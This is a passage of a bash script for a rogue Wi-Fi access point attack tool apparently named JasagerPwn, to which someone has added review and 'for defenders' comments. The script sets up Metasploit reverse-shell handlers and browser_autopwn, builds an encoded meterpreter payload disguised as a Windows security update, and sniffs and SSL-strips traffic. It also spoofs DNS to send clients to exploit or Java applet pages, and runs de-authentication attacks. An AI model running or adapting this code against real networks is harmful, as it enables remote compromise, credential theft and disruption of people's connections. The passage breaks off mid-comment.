# Write the two Metasploit resource files this script hands to msfconsole:
# /tmp/msfrcBP and /tmp/msfrcFU. The two branches produce the same files
# except that the -a 1 branch first calls metScript (defined elsewhere) and
# adds an InitialAutorunScript line to each handler. The expansions inside
# the quoted text are $fonIP, $winPORT, $osxPORT, $nixPORT and $SETpath; the
# leading spaces of the continuation lines are part of the file content.
# When $autoMetScript is neither 0 nor 1 no file is written and whatever is
# already at those paths is used as it is.
# NOTE(review): both are fixed names in a world-writable directory and are
# later executed by msfconsole with this script's privileges, so a local user
# who can place or replace them controls what runs. On a host under
# examination, these two files record the listener address and ports that
# were configured.
if [ $autoMetScript -eq 1 ]; then

  metScript

  #Metasploit rc w/ auto script BP

  if [ -e “/tmp/msfrcBP” ] ; then rm “/tmp/msfrcBP” ; fi

  echo -e “use auxiliary/server/browser_autopwn

  set PAYLOAD windows/meterpreter/reverse_tcp

  set LHOST $fonIP

  set SRVPORT 80

  set SRVHOST $fonIP

  set URIPATH /

  set ExitOnSession false

  set InitialAutorunScript multiscript -rc $SETpath/src/program_junk/multi_meter.file

  run -j” > /tmp/msfrcBP

  #Metasploit rc auto script FU

  if [ -e “/tmp/msfrcFU” ] ; then rm “/tmp/msfrcFU” ; fi

  echo -e “use exploit/multi/handler

  set PAYLOAD windows/meterpreter/reverse_tcp

  set LHOST $fonIP

  set LPORT $winPORT

  set InitialAutorunScript multiscript -rc $SETpath/src/program_junk/multi_meter.file

  set ExitOnSession false

  exploit -j

  set PAYLOAD osx/x86/shell_reverse_tcp

  set LHOST 0.0.0.0

  set LPORT $osxPORT

  set InitialAutorunScript multiscript -rc $SETpath/src/program_junk/multi_meter.file

  set ExitOnSession false

  exploit -j

  set PAYLOAD linux/x86/shell/reverse_tcp

  set LHOST 0.0.0.0

  set LPORT $nixPORT

  set InitialAutorunScript multiscript -rc $SETpath/src/program_junk/multi_meter.file

  set ExitOnSession false

  exploit -j” > /tmp/msfrcFU

elif [ $autoMetScript -eq 0 ]; then

  #Metasploit rc no auto script BP

  if [ -e “/tmp/msfrcBP” ] ; then rm “/tmp/msfrcBP” ; fi

  echo -e “use auxiliary/server/browser_autopwn

  set PAYLOAD windows/meterpreter/reverse_tcp

  set LHOST $fonIP

  set SRVPORT 80

  set SRVHOST $fonIP

  set URIPATH /

  set ExitOnSession false

  run -j” > /tmp/msfrcBP

  #Metasploit rc no auto script FakeUpdate

  if [ -e “/tmp/msfrcFU” ] ; then rm “/tmp/msfrcFU” ; fi

  echo -e “use exploit/multi/handler

  set PAYLOAD windows/meterpreter/reverse_tcp

  set LHOST $fonIP

  set LPORT $winPORT

  set ExitOnSession false

  exploit -j

  set PAYLOAD osx/x86/shell_reverse_tcp

  set LHOST 0.0.0.0

  set LPORT $osxPORT

  set ExitOnSession false

  exploit -j

  set PAYLOAD linux/x86/shell/reverse_tcp

  set LHOST 0.0.0.0

  set LPORT $nixPORT

  set ExitOnSession false

  exploit -j” > /tmp/msfrcFU

fi

# Turn the host into a forwarding gateway and start the monitoring windows.
# Everything is launched in the background in its own xterm; none of the
# results is checked, and only two PIDs (messageID, dsniffID) are recorded.
sleep 1 && echo -e “\e[01;32m[>]\e[00m Enabling ipv4 Forwarding…”

xterm -geometry 0x0+0+0 -e “modprobe tun” &

# Kernel-wide setting; nothing in this part of the file turns it back off, so
# it may persist after the tool exits - check the cleanup routine.
echo “1” > /proc/sys/net/ipv4/ip_forward

#tail messages for DHCP info

# $! after this line is the PID of the xterm, not of tail or grep.
xterm -geometry 75x16+0+509 -bg black -fg red -T “[JasagerPwn-DHCP] v$version” -e “tail -f /var/log/messages | grep DHCP” &

messageID=`echo $!`

echo -e “\e[01;32m[>]\e[00m Starting up DHCP3…”

xterm -geometry 75x9+0+474 -bg black -fg green -T “Starting DHCP3 Server” -e “/etc/init.d/dhcp3-server start” &

echo -e “\e[01;32m[>]\e[00m Loading URL Snarf/Driftnet…”

# Three passive capture tools are attached to $FONIFACE. driftnet runs in a
# zero-size window, so it is not visible on the desktop while it runs.
xterm -geometry 0x0+0+0 -e “driftnet -v -s -i $FONIFACE” &

xterm -geometry 75x24+464+405 -bg black -fg green -T “[JasagerPwn-DSniff] v$version” -e “dsniff -i $FONIFACE” &

dsniffID=`echo $!`

xterm -geometry 75x37+0+0 -bg black -fg green -T “[JasagerPwn-URLSnarf] v$version” -e “urlsnarf -i $FONIFACE” &

echo -e “\e[01;32m[>]\e[00m Setting up IP Tables…”

# IPTABLES is defined elsewhere in this script.
IPTABLES

# NOTE(review): the first echo below has an opening quote but no closing one
# in this listing, so as printed the string runs on into the next line.
echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version Rev$revision Started! More @ www.info-s3curity.com

echo -e “\e[01;36m[~]\e[00m ALL Attacks are now operating system agnostic OSX/MS/Linux!!”

#MAIN OPTIONS FOR AP ATTACKS

while true

do

  # One pass of the main menu: re-apply the AP-side address, print the banner
  # and the current mode, list the choices and read the operator's selection.
  echo

  echo

  # Re-asserts $fonIP on $FONIFACE at the top of every pass.
  ifconfig $FONIFACE $fonIP

  # Parses the "inet addr" field of ifconfig output. ourIP is not referenced
  # again in the visible part of the listing.
  ourIP=`ifconfig $FONIFACE | awk ‘/inet addr/ {split ($2,A,”:”); print A[2]}’`

  echo -e “\e[01;31m[+][————————————————————————————————-][+]\e[00m”

  echo -e “\e[01;31m[+][==========================-Main Menu-============================][+]\e[00m”

  echo -e “\e[01;31m[+][————————————————————————————————-][+]\e[00m”

  #echo -e “\e[01;32m[!]\e[00m Press [S]niff, [F]akeUpdate, [D]eAuth, [B]rowserPwn, [J]ava Attack, e[X]it “

 # Mode flags are compared as integers and are set by the case arms further
 # down. Only the first flag that equals 1 is reported on the status line.
 if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then

   echo -e “\e[01;36m                   [*] Attack Status: Idle..\e[00m”

 elif [ $sniffing -eq 1 ]; then

   echo -e “\e[01;31m                   [*] Attack Status: SSLstrip & Sniffing\e[00m”

 elif [ $browserpwn -eq 1 ]; then

   echo -e “\e[01;31m                   [*] Attack Status: MSF Browser-AutoPwn\e[00m”

 elif [ $fakeupdate -eq 1 ]; then

   echo -e “\e[01;31m                   [*] Attack Status: MSF Fake Update\e[00m”

 elif [ $javaATK -eq 1 ]; then

   echo -e “\e[01;31m                   [*] Attack Status: SET Java Applet\e[00m”

 fi

  echo -e “\e[01;32m[-]\e[00m [1][S] = Sniff The APs Network.”

  echo -e “\e[01;32m[-]\e[00m [2][F] = Redirect LAN to Fake Security Update Page.”

  echo -e “\e[01;32m[-]\e[00m [3][B] = Redirect LAN to Metasploit BrowserAutopwn.”

  echo -e “\e[01;32m[-]\e[00m [4][J] = Redirect LAN to Java Applet Page.”

  echo -e “\e[01;32m[-]\e[00m [5][D] = De-Authorize Clients on other APs.”

  echo -e “\e[01;32m[-]\e[00m [6][N] = Adjust Script & Network Settings”

  echo -e “\e[01;32m[-]\e[00m [7][X] = Exit JasagerPwn Script”

  echo -n -e “\e[01;31m                   [?] Choose an attack for AP:\e[00m “

  # read without -r: backslashes in the answer are treated as escapes. The
  # value is only matched against the case patterns that follow.
  read -e CONFIRM3

  echo

  case $CONFIRM3 in

 # Menu 1/S: HTTP interception. Refused while BrowserPwn, the Java applet page
 # or FakeUpdate is active (the error texts call it an iptables conflict), and
 # refused again if sniffing is already on.
 # For defenders: this stage depends on a client making a plain-HTTP request
 # first; HSTS (ideally preloaded) and browser HTTPS-only modes remove that
 # opening.
 s|S|sniff|Sniff|1)

   if [ $browserpwn -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with browserPwn. IPtables Conflict.”

   elif [ $javaATK -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict.”

   elif [ $fakeupdate -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. IPtables Conflict.”

   elif [ $sniffing -eq 0 ]; then

   # NAT rule: TCP port 80 arriving on $FONIFACE is redirected to local port
   # $sslport, where sslstrip is started on the next line. The long options are
   # printed with a dash character where a double hyphen belongs.
   iptables -t nat -A PREROUTING —in-interface $FONIFACE -p tcp —destination-port 80 -j REDIRECT —to-ports $sslport

   xterm -geometry 75x3+1-25 -bg black -fg green -e “sslstrip -l $sslport && sleep 3” &

   # Both branches open the same tail window; the else branch only creates the
   # log file first. sslstrip.log is a relative path, so it lives in whatever
   # the current working directory is.
   if [ -e sslstrip.log ]; then

     xterm -geometry 75x24+464+65 -bg black -fg green -T “SSLStrip Sniffing” -e “tail -f sslstrip.log” &

     # PID of the xterm, not of tail.
     TAILPID=`echo $!`

   else

     touch sslstrip.log

     xterm -geometry 75x24+464+65 -bg black -fg green -T “SSLStrip Sniffing” -e “tail -f sslstrip.log” &

     TAILPID=`echo $!`

   fi

   echo -e “\e[01;33m[!]\e[00m\e[00m Attack Started: SSLStripping / Sniffing”

   # wasSniffing is read by the stop handlers of the BrowserPwn and Java modes.
   wasSniffing=”1”

   sniffing=”1”

   elif [ $sniffing -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Your Already Sniffing!!”

   fi

 ;;

 # Menu 2/F: fake security-update page. When the mode is already active the
 # arm goes straight to updateLoop (defined outside this part of the listing);
 # it is refused while BrowserPwn or the Java applet page is active.
 # For defenders: the file produced here is named like a Windows KB update.
 # Taking updates only through the signed OS update channel, plus code-signing
 # or application allow-listing on clients, does not rely on users noticing.
 F|f|fakeupdate|Fakeupdate|2)

   if [ $fakeupdate -eq 1 ]; then

     updateLoop

   elif [ $browserpwn -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with BrowserPwn. Port conflict.”

   elif [ $javaATK -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict.”

   elif [ $fakeupdate -eq 0 ]; then

     # The flag is set before the executable is built, so a failed build still
     # leaves the menu reporting this mode as active.
     fakeupdate=”1”

     # Remove any executable left over from an earlier run.
     if [ -e “$Fwww/ms/Windows-KB183905-x86-ENU.exe” ]; then rm -f “$Fwww/ms/Windows-KB183905-x86-ENU.exe”; fi

     # Runs in the foreground (no trailing &), so the script waits for this
     # window to close. The output is written under $Fwww/ms/ and
     # $SPWD/src/resources/NOTEPAD.EXE is passed as the -x input.
     xterm -geometry 75x15+10+0 -bg black -fg green -T “[Metasploit Payload] v$version - Metasploit (Windows)” -e “msfpayload windows/meterpreter/reverse_tcp LHOST=$fonIP LPORT=$winPORT R | msfencode -x $SPWD/src/resources/NOTEPAD.EXE -t exe -e x86/shikata_ga_nai -c 10 -o $Fwww/ms/Windows-KB183905-x86-ENU.exe”

     # fakeupdate is used here as a command name; shell keeps functions and
     # variables in separate namespaces. Its definition is outside this part
     # of the listing. updateLoop runs only if it returns success.
     fakeupdate && updateLoop

   fi

 ;;

 # Menu 3/B: redirect clients to the Metasploit browser module, then show a
 # stop/menu sub-loop. Refused while FakeUpdate or the Java applet page is on.
 # For defenders: this mode relies on forged DNS answers on the local segment
 # and on out-of-date browsers or plug-ins on the client. The closing message
 # about ipconfig /flushdns shows that affected clients keep the forged entries
 # in their resolver cache afterwards, which matters during clean-up.
 B|b|browserpwn|browserPwn|3)

   if [ $fakeupdate -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port conflict.”

   elif [ $javaATK -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict.”

   elif [ $browserpwn -eq 0 ]; then

   # metScript is defined outside this part of the listing.
   if [ $autoMetScript -eq 1 ]; then metScript; fi

     # Clear the way for the module's own web server: SIGKILL any dnsspoof and
     # stop Apache. Both run in background windows and are not waited for.
     xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof” -e “killall -9 dnsspoof” &

     xterm -geometry 75x5+0+94 -bg black -fg green -T “[JasagerPwn-Apache Kill] v$version - Stopping Apache2” -e “/etc/init.d/apache2 stop” &

     # /tmp/msfrcBP is the resource file written earlier in the script at a
     # fixed path under /tmp.
     xterm -geometry 110x42+464-38 -bg black -fg green -T “[Metasploit Handler] v$version” -e “msfconsole -r /tmp/msfrcBP” &

     sleep 30 #Wait for browserAutopwn to start up modules and web server

     echo -e “\e[01;33m[!]\e[00m Forcing LAN to visit our site…”

     # ipTableRedirect is defined outside this part of the listing.
     ipTableRedirect

     xterm -geometry 75x7+0-36 -bg black -fg green -T “[JasagerPwn-DNS Spoof] v$version” -e “dnsspoof -i $FONIFACE -f /tmp/jasagerpwn.dns” &

     echo -e “\e[01;33m[!]\e[00m Starting Web Server browserPwn attack @ $fonIP:80…”

     browserpwn=”1”

   fi

 # Sub-menu loop. It exits at once when FakeUpdate or the Java mode is active,
 # which is the case after one of the refusals above.
 while true

 do

     if [ $fakeupdate -eq 1 ]; then break; fi

     if [ $javaATK -eq 1 ]; then break; fi

     echo

     echo -e “\e[01;33m[MODE][============-BrowserPwn Metasploit-==========][!]\e[00m”

     echo -e -n “\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: “

     read -e USR_CHOICE2

     #read -r -p “[?] Enter [I] to give Internet back or [M] for Main Menu: ” USR_CHOICE2

     case $USR_CHOICE2 in

# Stop: three delete attempts against nat/PREROUTING, each in a foreground
# xterm, followed by a fresh call to IPTABLES (defined elsewhere). Whether the
# specifications match the rules that were inserted depends on ipTableRedirect,
# which is not visible here.
S|s|Stop|stop|1)

 xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE” 

 xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE —jump REDIRECT” 

 xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE —proto tcp —jump DNAT —to $fonIP”

 IPTABLES

 xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof” -e “killall -9 dnsspoof” &

 xterm -geometry 75x5+0+94 -bg black -fg green -T “[JasagerPwn-Apache Kill] v$version - Stopping Apache2” -e “/etc/init.d/apache2 stop” &

 browserpwn=”0”

 sleep 2

 # Called with no arguments; presumably a shell function named sslstrip that
 # is defined elsewhere, since the program was started with -l above - confirm.
 if [ $wasSniffing != “0” ]; then sslstrip ; fi

 echo -e “\e[01;33m[!]\e[00m Kill Metasploit Server Jobs if you use FakeUpdate!!”

 echo -e “\e[01;33m[!]\e[00m Dont Forget To Run ‘ipconfig /flushdns’ On Victim!!”

 break

;;

# Menu: leave the sub-loop with the mode still running.
M|m|Menu|menu|2)

 break

;;

*) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

     esac

 done

 ;;

 # Menu 4/J: serve a cloned page through SET's Java applet workflow, redirect
 # clients to it, then show a stop/menu sub-loop. Refused while BrowserPwn or
 # FakeUpdate is active, or while an earlier set-automate process is running.
 # For defenders: the page asks the visitor to run a Java applet. Removing or
 # disabling the browser Java plug-in, and refusing applets that are unsigned
 # or from unknown publishers, removes the client-side prerequisite.
 J|j|java|Java|4)

   # PIDs of processes whose ps line contains "python ./set-automate".
   # NOTE(review): the value is used unquoted inside [ ] below, so more than
   # one PID makes the test a syntax error rather than true or false.
   SETcheck=`ps aux | grep “python ./set-automate” | grep -v grep | awk ‘{ print $2 }’`

   if [ $browserpwn -eq 1 ]; then

     echo -e “\e[01;31m[!]\e[00m Error: Cant run with browserPwn. Port Conflict.”

   elif [ $fakeupdate -eq 1 ]; then

     echo -e “\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port Conflict.”

   elif [ $SETcheck ] && [ $javaATK -eq 0 ]; then

echo -e “\e[01;31m[!]\e[00m Error: You still have a SET window open.. Close it first or this will cause problems..”

   elif [ $javaATK -eq 0 ] && [ ! $SETcheck ]; then

     echo -n -e “\e[01;33m[!]\e[00m [1][G]oogle or [2][J]ava Required:  ”

     # The variable JavaSite holds the answer; the JavaSite called in each arm
     # below is a command of the same name, defined outside this listing part.
     read -e JavaSite

     case $JavaSite in

# Google template: restart Apache (once in a window, once via service), then
# disable every site in sites-available, enable only "google" and reload.
G|g|Google|google|1)

   if [ $autoMetScript -eq 1 ]; then metScript; fi

   javasite=”1”

   JavaSite

   xterm -geometry 75x8+100+0 -fg green -bg black -T “v$version - Starting Apache2” -e “/etc/init.d/apache2 restart”

   service apache2 restart > /dev/null

   sleep .5

   xterm -geometry 75x8+100+0 -fg green -bg black -T “v$version - Starting Apache2” -e “ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite google  && /etc/init.d/apache2 reload”

   sleep .5

   # /tmp/auto-google2 is an input file at a fixed path under /tmp; it is
   # created outside this part of the listing.
   xterm -fg green -bg black -geometry 110x42+464-38 -T “[SET-JavaApplet] v$version - WebServer” -e “cd $SETpath && ./set-automate /tmp/auto-google2” &

;;

# "Java required" template: same sequence with the javapwn site and
# /tmp/auto-java2.
J|j|Java|java|2)

   if [ $autoMetScript -eq 1 ]; then metScript; fi

   javasite=”2” && sleep 1

   JavaSite

   xterm -geometry 75x8+100+0 -bg black -fg green -T “v$version - Starting Apache2” -e “/etc/init.d/apache2 restart”

   service apache2 restart > /dev/null

   sleep .5

   xterm -geometry 75x8+100+0 -bg black -fg green -T “v$version - Starting Apache2” -e “ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite javapwn  && /etc/init.d/apache2 reload”

   sleep .5

   xterm -fg green -bg black -geometry 110x42+464-38 -T “[SET-JavaApplet] v$version - WebServer” -e “cd $SETpath && ./set-automate /tmp/auto-java2” & 

;;

*) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

     esac

# NOTE(review): everything from here to the closing fi runs for any answer,
# including an invalid one that only printed the error above, so javaATK is
# set to 1 even when no template was selected.
sleep 4

echo -n -e “\e[01;34m[*]\e[00m Press [ENTER] when SET is ready..”

# $blahblahblahnotused is expanded before read runs; if it is unset, read gets
# no variable name and stores the line in REPLY.
read -e $blahblahblahnotused

echo -e “\e[01;33m[!]\e[00m Forcing LAN to visit our site…”

ipTableRedirect

if [ $autoMetScript -eq 1 ]; then metScript; fi

# Put index.html back from index2.html / index1.html when it is missing, in
# the SET template directory and under /var/www/javapwn.
if [ -e “$SETpath/src/web_clone/site/template/index2.html” ] && [ ! -e “$SETpath/src/web_clone/site/template/index.html” ]; then

 mv “$SETpath/src/web_clone/site/template/index2.html” “$SETpath/src/web_clone/site/template/index.html”

fi

if [ -e “/var/www/javapwn/index2.html” ] && [ ! -e “/var/www/javapwn/index.html” ]; then

 mv “/var/www/javapwn/index2.html” “/var/www/javapwn/index.html”

fi

if [ -e “/var/www/javapwn/index1.html” ] && [ ! -e “/var/www/javapwn/index.html” ]; then

 mv “/var/www/javapwn/index1.html” “/var/www/javapwn/index.html”

fi

# The kill runs in the foreground, so it finishes before dnsspoof is started
# again with /tmp/jasagerpwn.dns as its hosts file.
xterm -geometry 75x7+0-36 -bg black -fg green -T “[JasagerPwn-Kill DNS] v$version - Killing DNSSpoof” -e “killall -9 dnsspoof”

xterm -geometry 75x7+0-36 -bg black -fg green -T “[JasagerPwn-DNS Spoof] v$version - DNSSpoof” -e “dnsspoof -i $FONIFACE -f /tmp/jasagerpwn.dns” &

javaATK=”1”

   fi

   # Sub-menu loop. It exits at once after any of the refusals above.
   while true

   do

if [ $SETcheck ] && [ $javaATK -eq 0 ]; then break; fi

if [ $browserpwn -eq 1 ]; then break; fi

if [ $fakeupdate -eq 1 ]; then break; fi

echo

echo -e “\e[01;33m[MODE][==========-Java Applet Attack SET-==========][!]\e[00m”

echo -e -n “\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: “

read -e USR_CHOICE9

#read -r -p “[?] Enter [I] to give Internet back or [M] for Main Menu: ” USR_CHOICE9

case $USR_CHOICE9 in

 # Stop: same teardown as the BrowserPwn mode - three PREROUTING delete
 # attempts, IPTABLES again, SIGKILL dnsspoof, stop Apache, clear the flag.
 S|s|Stop|stop|1)

   xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE”

   xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE —jump REDIRECT” 

   xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE —proto tcp —jump DNAT —to $fonIP”

   IPTABLES

   xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof” -e “killall -9 dnsspoof” &

   xterm -geometry 75x5+0+94 -bg black -fg green -T “[JasagerPwn-Apache Kill] v$version - Stopping Apache2” -e “/etc/init.d/apache2 stop” &

   javaATK=”0”

   sleep 3

   # Called with no arguments; presumably a shell function named sslstrip
   # defined elsewhere - confirm.
   if [ $wasSniffing != “0” ]; then sslstrip ; fi

   # For incident responders: the message below implies forged DNS entries
   # stay in the client's resolver cache until it is flushed.
   echo -e “\e[01;33m[!]\e[00m DONT FORGET TO RUN ‘ipconfig /flushdns’ ON VICTIM!!”

   break

 ;;

 # Menu: leave the sub-loop with the mode still running.
 M|m|Menu|menu|2)

   break

 ;;

 *) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

esac

   done

 ;;

 # Menu 5/D: sub-menu that starts or stops 802.11 de-authentication tools on
 # $MIFACE (airdrop-ng with a rules file, src/deauth.sh, or aireplay-ng against
 # one BSSID and optionally one client).
 # For defenders: de-authentication frames are unauthenticated management
 # frames in legacy 802.11. Protected Management Frames (802.11w, mandatory in
 # WPA3) address this, and wireless IDS products commonly alert on bursts of
 # deauth frames.
 D|d|deauth|Deauth|DeAuth|5)

   # Not referenced again in the visible part of the listing.
   attackCheck=`ifconfig | grep $MIFACE | awk ‘{print $1}’ | cut -b 4`

   while true

   do

     echo

     echo -e “\e[01;33m[MODE][======================-DeAuth Attacks-=========================][!]\e[00m”

     echo -e “\e[01;33m[!]\e[00m [1][A]irodrop-ng  [2][D]eAuth Mass  [3][S]ingle DeAuth”

     echo -e “\e[01;33m[!]\e[00m [4][K]ill DeAuth  [5][M]ain menu”

     #read -r -p “[?] Please enter [ A | D | S | K | M ]:  ”  USR_CHOICE3

     echo -e -n “\e[01;33m[!]\e[00m Choose From Above: “

     read -e USR_CHOICE3

     case $USR_CHOICE3 in

 # Rule-driven mode. Needs /usr/bin/airdrop-ng to exist. Old captures under
 # /tmp/cap-* are removed, airodump-ng writes a fresh CSV with the /tmp/cap
 # prefix, and after 10 s airdrop-ng is started on /tmp/cap-01.csv with the
 # rules in /tmp/deauth.conf. All of these are fixed paths under /tmp.
 A|a|airodrop|Airodrop|1)

   if [ -e “/usr/bin/airdrop-ng” ]; then

   if [ -e “/tmp/cap-01.csv” ]; then rm /tmp/cap-* ; fi

     sleep 2

     xterm -geometry 90x30+464+0 -bg black -fg green -T “[JasagerPwn-Airodump] Capturing APs” -e “airodump-ng -w /tmp/cap -o csv $MIFACE” &

     # PIDs of the xterm windows, used by the Kill arm below.
     AIRDUMPID=`echo $!`

     sleep 10

     xterm -geometry 75x12+464+418 -bg black -fg green -hold -T “[JasagerPwn-Airdrop Attack] v$version” -e “airdrop-ng -b -i $MIFACE -r /tmp/deauth.conf -t /tmp/cap-01.csv” &

     AIRDROPID=`echo $!`

   else

     echo

     echo -e “\e[01;31m[!]\e[00m Error: You need to fully install airdrop-ng for this.”

     echo -e “\e[01;31m[!]\e[00m Please go to /pentest/wireless/aircrack-ng/scripts/airdrop-ng and run install.py.”

   fi

 ;;

 # Runs src/deauth.sh (relative to the current directory) in its own window.
 # The helper script is not part of this listing.
 D|d|deauth|DeAuth|2)

   xterm -geometry 75x12+464+265 -bg black -fg green -T “[JasagerPwn-MassDeauth.sh] v$version” -e “chmod +x src/deauth.sh && bash src/deauth.sh” &

   DEAUTHPID=`echo $!`

 ;;

 # Single target. TBSSID and CMAC are typed by the operator and spliced
 # unquoted into the command string handed to xterm -e; neither value is
 # validated as a MAC address.
 S|s|single|Single|3)

   xterm -geometry 75x12+464+288 -bg black -fg green -T “[JasagerPwn-DeAuth Kill] v$version” -e “killall -9 aireplay” &

   xterm -geometry 95x47+577+0 -hold -bg black -fg green -T “[CLOSE MANUALLY] - Airodump Capture” -e “airodump-ng $MIFACE” &

   airID=`echo $!`

   echo

   read -r -p “[?] Enter the target APs BSSID: ”   TBSSID

   kill $airID

   read -r -p “[?] Do You want a specific client? [ Y | N ]: ”  DMODE

   case $DMODE in

     y|Y|Yes|yes|1)

xterm -geometry 95x47+577+0 -hold -bg black -fg green -T “[CLOSE MANUALLY] - Airodump Capture” -e “airodump-ng —bssid $TBSSID $MIFACE” &

echo

read -r -p “[?] Enter the target Client MAC: ” CMAC

xterm -geometry 75x12+464+265 -bg black -fg green -T “[JasagerPwn-Manual DeAuth] v$version” -e “aireplay-ng -D -0 20 -a $TBSSID -c $CMAC $MIFACE” &

     ;;

     n|N|No|no|2)

xterm -geometry 75x12+464+265 -bg black -fg green -T “[JasagerPwn-Manual DeAuth] v$version” -e “aireplay-ng -0 20 -D -a $TBSSID $MIFACE” &

     ;;

   *) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

   esac

 ;;

 # Kill: uses the PIDs recorded by the other arms. A variable that was never
 # set expands to nothing, and each && chain stops at the first kill that
 # fails, so later processes in the chain may be left running.
 K|k|kill|Kill|4)

   xterm -geometry 75x12+464+288 -bg black -fg green -T “[JasagerPwn-DeAuth Kill] v$version” -e “kill $DEAUTHPID && killall -9 aireplay-ng && killall airodump-ng && kill $AIRDROPID && kill $AIRDUMPID” &

   xterm -geometry 75x12+464+288 -bg black -fg green -T “[JasagerPwn-DeAuth Kill] v$version” -e “kill $AIRDROPID && kill $AIRDUMPID && kill $airID” &

 ;;

 M|m|menu|Menu|5)

   break

 ;;

 *) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

     esac

   done

 ;;

 # Menu 6/N: settings sub-menu - change the uplink interface, edit the
 # airdrop-ng rules file, or renew the uplink's DHCP lease. Each path restarts
 # a background loop that rewrites /etc/resolv.conf every 30 seconds.
 # NOTE(review): the script writes to /etc/resolv.conf and /proc/sys, so it
 # presumably runs as root. /tmp/resolv.sh is a fixed name that is written and
 # then executed, which exposes it to pre-creation or symlinks by other local
 # users; mktemp avoids that.
 N|n|Network|network|net|6)

     while true

     do

echo

echo -e “\e[01;33m[MODE][=======================-Script Settings-=======================][!]\e[00m”

echo -e “\e[01;33m[!]\e[00m [1][I]nterface       [2]DeAuth [C]onfig “

echo -e “\e[01;33m[!]\e[00m [3][R]efresh I-net   [4][M]ain Menu”

echo -e -n “\e[01;33m[!]\e[00m Choose From Above: “

read -e USR_CHOICE99

case $USR_CHOICE99 in

   I|i|interface|Interface|1)

read -r -p “[?] Using a WiFi Network (Adds DeAuth Rule) [ Y | N ]: ”  USR_CHOICE98

case $USR_CHOICE98 in

# Wi-Fi uplink: stop the old resolv loop, read the new interface name, re-apply
# the firewall rules for the current mode, restart the resolv loop and append
# a line built from the uplink's AP and own MAC to /tmp/deauth.conf.
y|Y|Yes|yes|1)

   # PIDs of processes whose ps line contains "bash /tmp/resolv". The window
   # title says DriftNET, but the command kills up to three of these PIDs.
   resolvIDs=`ps aux | grep “bash /tmp/resolv” | grep -v grep | awk ‘{ print $2 }’`

   xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DriftNET” -e “kill `echo $resolvIDs | awk ‘{ print $1 }’` ; kill `echo $resolvIDs | awk ‘{ print $2 }’` ; kill `echo $resolvIDs | awk ‘{ print $3 }’`” &

   # NOTE(review): dnsID2 holds a PID where it is set, but killall expects a
   # process name.
   xterm -geometry 75x12+464+288 -bg black -fg green -T “[ResolvLoop Kill] v$version” -e “killall -9 $dnsID2”

   echo

   read -p “[!] Connect to WiFi Network THEN Press [Enter] ..”

   echo

   echo -e “\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE”

   # The interface name is taken as typed; it is not checked against the
   # interfaces that exist.
   read -r -p “[?] Please Enter the New Gateway Interface: “ NEWIFACE  

   IFACE=`echo $NEWIFACE`

     # Idle: baseline rules. Any mode active: the redirect rules. Both helpers
     # are defined outside this part of the listing.
     if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then

IPTABLES

     elif [ $sniffing -eq 1 ] || [ $browserpwn -eq 1 ] || [ $fakeupdate -eq 1 ] || [ $javaATK -eq 1 ]; then

ipTableRedirect

     fi

   # Writes a one-line script that forces the resolver to 4.2.2.2 every 30 s.
   # For defenders: /etc/resolv.conf being rewritten on a timer is an anomaly
   # that file-integrity monitoring will show.
   echo “while true ; do echo “nameserver 4.2.2.2” > /etc/resolv.conf && sleep 30 ; done &” > /tmp/resolv.sh

   chmod +x /tmp/resolv.sh

   # Unlike the other two branches, dnsID2 is not updated after this start.
   bash /tmp/resolv.sh &

   wifiMAC=`ifconfig $IFACE | grep “HWaddr” | awk ‘{print $5}’ | tr “[a-z]” “[A-Z]”`

   newIFACEmac=`iwconfig $IFACE | grep “Access Point” | awk ‘{print $6}’`

   # Appends to the airdrop-ng rules file; presumably an allow rule that
